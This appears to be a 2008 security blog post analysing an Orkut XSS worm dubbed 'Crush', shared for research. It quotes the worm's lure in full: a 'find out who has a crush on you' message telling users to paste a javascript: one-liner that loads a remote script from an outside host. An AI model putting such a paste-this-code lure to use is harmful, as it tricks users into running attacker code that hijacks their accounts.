Thursday, February 28, 2008

Orkut “Crush” Worm

I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):



This is the vulnerable scrap


Find out who has crush on u….

wait 4 few minutes after pressing enter

Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)

Just copy the JavaScript, paste it in your address bar and PRESS ENTER


*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*


Trust me, ITS WORKING!!!


The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. It also appears that it may at least at one point have been a greasemonkey plugin by the headers, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.


No comments:

Post a Comment